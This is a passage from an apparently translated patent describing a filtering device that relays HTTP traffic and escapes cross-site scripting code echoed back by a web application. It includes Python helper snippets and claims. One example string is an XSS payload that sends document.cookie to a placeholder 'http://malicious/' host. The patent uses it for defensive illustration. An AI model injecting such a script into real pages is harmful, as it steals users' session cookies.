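    pattern = re.compile("|".join(re.escape(k) for k in table))
    return pattern.sub(lambda m: table[m.group(0)], text)

target, procs = parse_action('element: {"<", "&lt;"}, {">", "&gt;"}, {"&", "&amp;"}')
escaped = apply_processes("<b>&</b>", procs)
```

With the action "attr: del", parse_action returns the target "attr" and a single del process, and apply_processes returns an empty string for the attribute text.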

In step 910, the OUT filter 109 corrects the byte count of the HTML document embedded in the HTTP response to the byte count of the changed HTML document, returns the corrected HTTP response to the filtering device 107, and ends this procedure. In the example taken up in this procedure, the byte count of the HTML document is corrected from a8 bytes to b4 bytes in hexadecimal. The corrected HTTP response is as shown in FIG. 11, in which the character strings indicated by underlines 1101 to 1103 have been changed.
In step 911, the OUT filter 109 returns the empty character string "" to the filtering device 107 and ends this procedure.
In the present embodiment, only the form input items included in the HTTP request are subject to rule application, but other parts, for example the Referer field in the header of the HTTP request, may also be included in the rule application targets.
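The byte count correction of step 910 can be checked with a short calculation. The following Python sketch assumes that the conversion replaces each "<" with "&lt;" and each ">" with "&gt;", so that every replaced character grows by three bytes; the function name corrected_size is hypothetical.

```python
def corrected_size(old_size, old_text, new_text, encoding="utf-8"):
    """Byte count of the document after old_text was changed into new_text."""
    growth = len(new_text.encode(encoding)) - len(old_text.encode(encoding))
    return old_size + growth

before = ('test<script>window.open("http://malicious/save.cgi?"'
          '+escape(document.cookie))</script>')
after = before.replace("<", "&lt;").replace(">", "&gt;")
new_size = corrected_size(0xA8, before, after)
print(format(new_size, "x"))  # b4
```

The example string contains two "<" and two ">", so the document grows by 12 bytes, which agrees with the correction from a8 to b4 described above.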

FIG. 10 is an example of the HTTP response passed from the filtering device 107 to the OUT filter 109 in the procedure of the OUT filter 109 shown in FIG. 9. The parts of the HTTP response header that are not needed for the description are omitted. In this HTTP response, the script that was included in the HTTP request of FIG. 7 and that sends a cookie to http://malicious/ when executed remains, because the Web application 106 did not escape it properly.
FIG. 11 is the HTTP response obtained by executing the procedure of the OUT filter 109 shown in FIG. 9 on the HTTP response of FIG. 10. The script contained in FIG. 10 has been escaped so that it is not executed.

FIG. 1 is a system configuration diagram showing an embodiment of a network system to which the present invention is applied.
FIG. 2 is a diagram showing an example of an HTML document for entering a search key.
FIG. 3 is a diagram showing an example of an HTML document that displays search results.
FIG. 4 is a diagram showing a configuration example of the rule table.
FIG. 5 is a flowchart showing the illegal code filtering procedure of the filtering device.
FIG. 6 is a flowchart showing the processing procedure of the IN filter.
FIG. 7 is a diagram showing an example of an HTTP request.
FIG. 8 is a diagram showing an example of the recorded contents of the matching character string buffer.
FIG. 9 is a flowchart showing the processing procedure of the OUT filter.
FIG. 10 is a diagram showing an example of an HTTP response containing illegal code.
FIG. 11 is a diagram showing an example of an HTTP response from which the illegal code has been removed.

Explanation of symbols

101 Network
102 Client computer
103 Web browser
104 Server computer
105 Web server
106 Web application
107 Filtering device
108 IN filter
109 OUT filter
110 Rule table
111 Rule input/output unit

Claims

A filtering device that relays communication performed between a client and a server that returns an access response to an access request from the client, the filtering device comprising an IN filter that filters the access request based on an illegal code detection rule stored in advance in a rule table, and an OUT filter that filters the access response based on the illegal code detection rule, wherein
the IN filter comprises means for receiving the access request from the client, checking whether code specified in the illegal code detection rule is included in the access request, and, if it is included, copying the code to a buffer memory, and
the OUT filter comprises means for receiving the access response from the server, checking whether code corresponding to the code stored in the buffer memory is included in the access response, and, if it is included, changing that code based on the processing defined in the illegal code detection rule that detected the code stored in the buffer memory.

The filtering apparatus according to claim 1, wherein the illegal code detection rule is an illegal tag detection rule that is a rule for detecting an illegal tag.

The filtering apparatus according to claim 1, wherein the illegal code detection rule is an illegal tag attribute value detection rule that is a rule for detecting an illegal tag attribute value.

The filtering apparatus according to claim 1, further comprising an interface for updating the illegal code detection rule.